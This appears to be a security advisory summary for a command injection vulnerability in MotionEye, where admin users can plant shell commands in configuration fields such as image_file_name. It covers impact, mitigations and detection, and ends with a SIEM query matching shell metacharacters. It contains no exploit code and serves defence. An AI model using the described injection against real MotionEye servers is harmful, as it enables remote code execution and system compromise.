CVE-2025-60787
📋 TL;DR
MotionEye v0.43.1b4 and earlier contains an OS command injection vulnerability where authenticated admin users can inject malicious commands through configuration parameters like image_file_name. These commands execute when Motion restarts, allowing remote code execution. This affects all deployments using vulnerable versions with admin accounts.
💻 Affected Systems
- MotionEye
📦 What is this software?
Motioneye by Motioneye Project
Motioneye by Motioneye Project
Motioneye by Motioneye Project
Motioneye by Motioneye Project
Motioneye by Motioneye Project
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise with attacker gaining root/system-level access, installing persistent backdoors, stealing data, and pivoting to other systems.
Likely Case
Attacker gains shell access on the MotionEye server, can modify configurations, install cryptocurrency miners, or use the system as a foothold for further attacks.
If Mitigated
Limited impact due to network segmentation, minimal privileges, and monitoring catching exploitation attempts.
🎯 Exploit Status
Exploitation requires admin credentials. Public proof-of-concept code exists on GitHub showing command injection through image_file_name parameter.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Not available
Vendor Advisory: http://motioneye-project.com
Restart Required: Yes
Instructions:
1. Check MotionEye version. 2. Monitor official MotionEye project for security updates. 3. Apply patch when available. 4. Restart MotionEye service after patching.
🔧 Temporary Workarounds
Input Validation and Sanitization
allImplement strict input validation on configuration parameters to reject special characters and command injection attempts.
# Modify MotionEye source code to sanitize user input before writing to config files
# Example: Validate image_file_name contains only alphanumeric characters, underscores, and dots
Restrict Admin Access
allLimit admin account access to trusted users only and implement strong authentication controls.
# Review and minimize admin users in MotionEye settings
# Implement multi-factor authentication if supported
🧯 If You Can't Patch
- Network segmentation: Isolate MotionEye instances from critical systems and restrict outbound connections.
- Implement application firewall rules to block suspicious configuration parameter values containing shell metacharacters.
🔍 How to Verify
Check if Vulnerable:
Check MotionEye version in web interface or configuration files. If version is v0.43.1b4 or earlier, system is vulnerable.Check Version:
grep -i version /etc/motioneye/motioneye.conf || check web interface About pageVerify Fix Applied:
After applying workarounds, test by attempting to inject commands through image_file_name parameter and verify they are rejected or sanitized.📡 Detection & Monitoring
Log Indicators:
- Unusual configuration changes in motioneye.log
- Suspicious commands in system logs following Motion restart
- Multiple failed admin login attempts
Network Indicators:
- Unexpected outbound connections from MotionEye server
- Suspicious payloads in HTTP POST requests to configuration endpoints
SIEM Query:
source="motioneye.log" AND ("image_file_name" OR "configuration") AND ("|" OR ";" OR "$" OR "`" OR "&&")